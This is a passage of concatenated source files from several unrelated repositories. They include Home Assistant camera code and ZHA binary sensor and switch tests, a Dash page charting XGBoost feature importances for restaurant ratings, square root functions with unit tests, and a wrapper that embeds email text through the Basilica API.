stream_reader = await stream.get_reader()
return await async_aiohttp_proxy_stream(
self.hass,
request,
stream_reader,
ffmpeg_manager.ffmpeg_stream_content_type,
)
finally:
await stream.close()
@property
def supported_features(self):
"""Return supported features."""
if self._input:
return SUPPORT_STREAM
return 0
async def stream_source(self):
"""Return the stream source."""
return self._input
@property
def name(self):
"""Return the name of this camera."""
return self._name
```
#### File: components/zha/test_binary_sensor.py
```python
import zigpy.zcl.clusters.general as general
import zigpy.zcl.clusters.measurement as measurement
import zigpy.zcl.clusters.security as security
import zigpy.zcl.foundation as zcl_f
from homeassistant.components.binary_sensor import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, STATE_UNAVAILABLE
from .common import (
async_enable_traffic,
async_init_zigpy_device,
async_test_device_join,
make_attribute,
make_entity_id,
make_zcl_header,
)
async def test_binary_sensor(hass, config_entry, zha_gateway):
"""Test zha binary_sensor platform."""
# create zigpy devices
zigpy_device_zone = await async_init_zigpy_device(
hass,
[security.IasZone.cluster_id, general.Basic.cluster_id],
[],
None,
zha_gateway,
)
zigpy_device_occupancy = await async_init_zigpy_device(
hass,
[measurement.OccupancySensing.cluster_id, general.Basic.cluster_id],
[],
None,
zha_gateway,
ieee="fc00:e968:6179::de52:7100",
manufacturer="FakeOccupancy",
model="FakeOccupancyModel",
)
# load up binary_sensor domain
await hass.config_entries.async_forward_entry_setup(config_entry, DOMAIN)
await hass.async_block_till_done()
# on off binary_sensor
zone_cluster = zigpy_device_zone.endpoints.get(1).ias_zone
zone_entity_id = make_entity_id(DOMAIN, zigpy_device_zone, zone_cluster)
zone_zha_device = zha_gateway.get_device(zigpy_device_zone.ieee)
# occupancy binary_sensor
occupancy_cluster = zigpy_device_occupancy.endpoints.get(1).occupancy
occupancy_entity_id = make_entity_id(
DOMAIN, zigpy_device_occupancy, occupancy_cluster
)
occupancy_zha_device = zha_gateway.get_device(zigpy_device_occupancy.ieee)
# test that the sensors exist and are in the unavailable state
assert hass.states.get(zone_entity_id).state == STATE_UNAVAILABLE
assert hass.states.get(occupancy_entity_id).state == STATE_UNAVAILABLE
await async_enable_traffic(
hass, zha_gateway, [zone_zha_device, occupancy_zha_device]
)
# test that the sensors exist and are in the off state
assert hass.states.get(zone_entity_id).state == STATE_OFF
assert hass.states.get(occupancy_entity_id).state == STATE_OFF
# test getting messages that trigger and reset the sensors
await async_test_binary_sensor_on_off(hass, occupancy_cluster, occupancy_entity_id)
# test IASZone binary sensors
await async_test_iaszone_on_off(hass, zone_cluster, zone_entity_id)
# test new sensor join
await async_test_device_join(
hass, zha_gateway, measurement.OccupancySensing.cluster_id, DOMAIN
)
async def async_test_binary_sensor_on_off(hass, cluster, entity_id):
"""Test getting on and off messages for binary sensors."""
# binary sensor on
attr = make_attribute(0, 1)
hdr = make_zcl_header(zcl_f.Command.Report_Attributes)
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ON
# binary sensor off
attr.value.value = 0
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
async def async_test_iaszone_on_off(hass, cluster, entity_id):
"""Test getting on and off messages for iaszone binary sensors."""
# binary sensor on
cluster.listener_event("cluster_command", 1, 0, [1])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ON
# binary sensor off
cluster.listener_event("cluster_command", 1, 0, [0])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
```
#### File: components/zha/test_switch.py
```python
from unittest.mock import call, patch
import zigpy.zcl.clusters.general as general
import zigpy.zcl.foundation as zcl_f
from homeassistant.components.switch import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, STATE_UNAVAILABLE
from .common import (
async_enable_traffic,
async_init_zigpy_device,
async_test_device_join,
make_attribute,
make_entity_id,
make_zcl_header,
)
from tests.common import mock_coro
ON = 1
OFF = 0
async def test_switch(hass, config_entry, zha_gateway):
"""Test zha switch platform."""
# create zigpy device
zigpy_device = await async_init_zigpy_device(
hass,
[general.OnOff.cluster_id, general.Basic.cluster_id],
[],
None,
zha_gateway,
)
# load up switch domain
await hass.config_entries.async_forward_entry_setup(config_entry, DOMAIN)
await hass.async_block_till_done()
cluster = zigpy_device.endpoints.get(1).on_off
entity_id = make_entity_id(DOMAIN, zigpy_device, cluster)
zha_device = zha_gateway.get_device(zigpy_device.ieee)
# test that the switch was created and that its state is unavailable
assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
# allow traffic to flow through the gateway and device
await async_enable_traffic(hass, zha_gateway, [zha_device])
# test that the state has changed from unavailable to off
assert hass.states.get(entity_id).state == STATE_OFF
# turn on at switch
attr = make_attribute(0, 1)
hdr = make_zcl_header(zcl_f.Command.Report_Attributes)
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ON
# turn off at switch
attr.value.value = 0
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
# turn on from HA
with patch(
"zigpy.zcl.Cluster.request",
return_value=mock_coro([0x00, zcl_f.Status.SUCCESS]),
):
# turn on via UI
await hass.services.async_call(
DOMAIN, "turn_on", {"entity_id": entity_id}, blocking=True
)
assert len(cluster.request.mock_calls) == 1
assert cluster.request.call_args == call(
False, ON, (), expect_reply=True, manufacturer=None
)
# turn off from HA
with patch(
"zigpy.zcl.Cluster.request",
return_value=mock_coro([0x01, zcl_f.Status.SUCCESS]),
):
# turn off via UI
await hass.services.async_call(
DOMAIN, "turn_off", {"entity_id": entity_id}, blocking=True
)
assert len(cluster.request.mock_calls) == 1
assert cluster.request.call_args == call(
False, OFF, (), expect_reply=True, manufacturer=None
)
# test joining a new switch to the network and HA
await async_test_device_join(hass, zha_gateway, general.OnOff.cluster_id, DOMAIN)
```
|
{
"source": "JeanFraga/DS8-Build_Week-1",
"score": 3
}
|
#### File: DS8-Build_Week-1/pages/index.py
```python
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.express as px
import pandas as pd
from joblib import load
from xgboost import XGBClassifier
import category_encoders as ce
from sklearn.pipeline import make_pipeline
from sklearn.model_selection import GridSearchCV, StratifiedKFold
from app import app
url = 'https://raw.githubusercontent.com/JeanFraga/DS8-Build_Week-1/master/notebooks/Restaurant_Consumer_Data_merged'
df = pd.read_csv(url)
pipeline1 = load('assets/xgboost_model_y1.joblib')
pipeline2 = load('assets/xgboost_model_y2.joblib')
pipeline3 = load('assets/xgboost_model_y3.joblib')
pipelines = {}
pipelines['pipeline1'] = pipeline1
pipelines['pipeline2'] = pipeline2
pipelines['pipeline3'] = pipeline3
target1 = 'rating'
target2 = 'food_rating'
target3 = 'service_rating'
X = df.drop(columns=[target1, target2, target3])
y1 = df[target1]
y2 = df[target2]
y3 = df[target3]
"""
https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
Layout in Bootstrap is controlled using the grid system. The Bootstrap grid has
twelve columns.
There are three main layout components in dash-bootstrap-components: Container,
Row, and Col.
The layout of your app should be built as a series of rows of columns.
We set md=4 indicating that on a 'medium' sized or larger screen each column
should take up a third of the width. Since we don't specify behaviour on
smaller size screens Bootstrap will allow the rows to wrap so as not to squash
the content.
"""
column1 = dbc.Col(
[
dcc.Markdown(
"""
## What rating will your restaurant receive?
This data allows us to predict the possible rating a user might give based on his profile and the information available about the restaurant. The ratings we can predict are:
1. Overall rating
2. Food rating
3. Service rating
My project revolves around the data gathered from 130 restaurants in Mexico and subsequently the rating those received from 138 users.
👉 With the graph on the right you can choose one of the 3 ratings and see which features mattered most when predicting the rating each user would give the restaurant.
❗ I have chosen to only display the top 25 features used to predict each rating from a list of 113.
👇 If you would like to see how changing some of these features individually affect the rating the restaurant is likely to receive please click below.
"""
),
dcc.Link(dbc.Button('Find Out!', color='dark'), href='/predictions')
],
md=4,
)
# importances = pd.Series(pipeline1.best_estimator_.named_steps['xgbclassifier'].feature_importances_, X.columns)
# n=25
# importances = importances.sort_values()[-n:]
# importances = importances.to_frame().reset_index()
# importances.columns=['column1','column2']
# fig = px.bar(importances,y='column1',x='column2',title=f'Top {n} features', orientation='h',width=700, height=700)
# gapminder = px.data.gapminder()
# fig = px.scatter(gapminder.query("year==2007"), x="gdpPercap", y="lifeExp", size="pop", color="continent",
# hover_name="country", log_x=True, size_max=80)
column2 = dbc.Col(
[
dcc.Dropdown(
id='rating_options',
options=[
{'label': '1. Overall Rating', 'value': 'pipeline1'},
{'label': '2. Food Rating', 'value': 'pipeline2'},
{'label': '3. Service Rating', 'value': 'pipeline3'}
],
value='pipeline1'
),
dcc.Graph(id='feature_importance_graph'), # figure=fig,id='feature_importance_graph'
]
)
layout = dbc.Row([column1, column2])
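# The callback below redraws the bar chart whenever the dropdown changes: the dropdown's 'value' property is the Input and the graph's 'figure' property is the Output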
@app.callback(
Output(component_id='feature_importance_graph',component_property='figure'),
[Input(component_id='rating_options', component_property='value')]
)
def feature_importance_per_rating(what_pipeline):
importances = pd.Series(pipelines[what_pipeline].best_estimator_.named_steps['xgbclassifier'].feature_importances_, X.columns)
n=25
importances = importances.sort_values()[-n:]
importances = importances.to_frame().reset_index()
importances.columns=['features','importance']
return px.bar(importances,y='features',x='importance',title=f'Top {n} features', orientation='h',width=700, height=700)
# row= X.iloc[[200]]
# explainer = shap.TreeExplainer(pipeline.best_estimator_.named_steps['xgbclassifier'])
# row_processed = pipeline.best_estimator_.named_steps['ordinalencoder'].transform(row)
# shap_values = explainer.shap_values(row_processed)
# shap.initjs()
# fig = shap.force_plot(
# base_value=explainer.expected_value[1],
# shap_values=shap_values[1],
# features=row
# )
# Get feature importances
#pipeline.best_estimator_.named_steps['xgbclassifier']
# Plot feature importances
# %matplotlib inline
# import matplotlib.pyplot as plt
```
|
{
"source": "JeanFraga/DS-Unit-3-Sprint-1-Software-Engineering",
"score": 4
}
|
#### File: module4-software-testing-documentation-and-licensing/DS8_unittest_JF/sqrt.py
```python
def lazy_sqrt(x: int):
"""simplest way to do square root"""
return x**0.5
def builtin_sqrt(x: int):
"""use the math library to get the square root"""
from math import sqrt
return sqrt(x)
def newton_sqrt(x: int):
"""uses the Newton method to return square root"""
val = x
while True:
last = val
val = (val + x / val) * 0.5
if abs(val - last) < 1e-9:
break
return val
```
#### File: module4-software-testing-documentation-and-licensing/DS8_unittest_JF/sqrt_test.py
```python
import unittest
from sqrt import lazy_sqrt, builtin_sqrt, newton_sqrt
#Our class for square root functions
class SqrtTests(unittest.TestCase):
"""These are our tests for square root funcs"""
def test_sqrt9(self):
sqrt_9 = lazy_sqrt(9)
self.assertEqual(sqrt_9, 3)
def test_sqrt2(self):
self.assertAlmostEqual(newton_sqrt(2), 1.414213562)
class OtherTests(unittest.TestCase):
def test_thing(self):
pass
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "JeanFraga/tagger-DS-Jean-fork",
"score": 3
}
|
#### File: tagger-DS-Jean-fork/Classes/Basillica.py
```python
from decouple import config
import basilica
class Basilica_api():
"""
Use API_KEY='SLOW_DEMO_KEY' if you do not have a basilica API_KEY
"""
columns = ['from_','subject', 'msg','content_type']
def __init__(self, df, API_KEY=config("BASILICA_KEY"), columns=columns):
self.df = df
self.API_KEY = API_KEY
self.columns = columns
def make_one_column(self):
"""
This function will make a new column named 'joined_columns' from the columns given to the class.
It will also look for a column named 'uid' to return that along with the other columns but not joined.
"""
ids_email = self.df['uid']
df_new = self.df[self.columns].copy()
df_new['joined_columns'] = df_new[df_new.columns[1:]].apply(lambda x: ','.join(x.dropna().astype(str)), axis=1)
df_new['id_email'] = ids_email
self.df = df_new
return None
def embed_basilica_to_df(self):
"""
This function will time how long basilica takes to run. For faster performance pass an API key that is functional.
Returns the df with a column named 'embedded'.
"""
self.make_one_column()
from timeit import default_timer as timer
start = timer()
column_embedded = []
for column in self.df['joined_columns']:
sentence = column
with basilica.Connection(self.API_KEY) as c:
embedding = list(c.embed_sentence(sentence, model='email', version='default', opts={}, timeout=5))
column_embedded.append(embedding)
self.df['embedded'] = column_embedded
end = timer()
print(end - start)
return self.df
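# Hypothetical usage sketch (assumes a DataFrame with a 'uid' column plus the
# default columns; the names here are illustrative only):
# import pandas as pd
# emails = pd.DataFrame({'uid': [1], 'from_': ['a@b.c'], 'subject': ['hi'],
# 'msg': ['hello world'], 'content_type': ['text/plain']})
# embedded = Basilica_api(emails, API_KEY='SLOW_DEMO_KEY').embed_basilica_to_df()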
```
|